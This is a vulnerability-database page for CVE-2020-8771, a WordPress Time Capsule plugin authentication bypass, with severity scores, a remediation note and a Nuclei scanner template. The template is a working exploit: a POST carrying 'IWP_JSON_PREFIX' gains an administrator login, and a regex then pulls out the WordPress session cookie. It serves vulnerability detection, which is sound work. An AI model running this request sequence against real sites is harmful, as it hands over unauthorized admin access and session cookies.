Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-8771
HistoryMar 10, 2021 - 6:59 a.m.

WordPress Time Capsule < 1.21.16 - Authentication Bypass

2021-03-1006:59:08
ProjectDiscovery
github.com
4

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.099 Low

EPSS

Percentile

94.9%

WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.

id: CVE-2020-8771

info:
  name: WordPress Time Capsule < 1.21.16 - Authentication Bypass
  author: princechaddha
  severity: critical
  description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the WordPress Time Capsule plugin.
  remediation: |
    Update WordPress Time Capsule plugin to version 1.21.16 or later.
  reference:
    - https://github.com/SECFORCE/WPTimeCapsulePOC
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8771
    - https://wpvulndb.com/vulnerabilities/10010
    - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
    - https://github.com/HycCodeQL/wordpress
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8771
    cwe-id: CWE-287
    epss-score: 0.06911
    epss-percentile: 0.93911
    cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wptimecapsule
    product: wp_time_capsule
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,wptimecapsule

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*

        IWP_JSON_PREFIX
      - |
        GET /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
          - "<h1>Dashboard</h1>"
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
        part: header
# digest: 4a0a0047304502200cc0dcb89b401e3b6076d25e168ca129176fcbaffc58685af1537dcb6b5a1288022100d9b4823cc1d19e9afa9bec4f25179a34c9f4ffcbc45674368cf670af46936359:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.099 Low

EPSS

Percentile

94.9%

Related for NUCLEI:CVE-2020-8771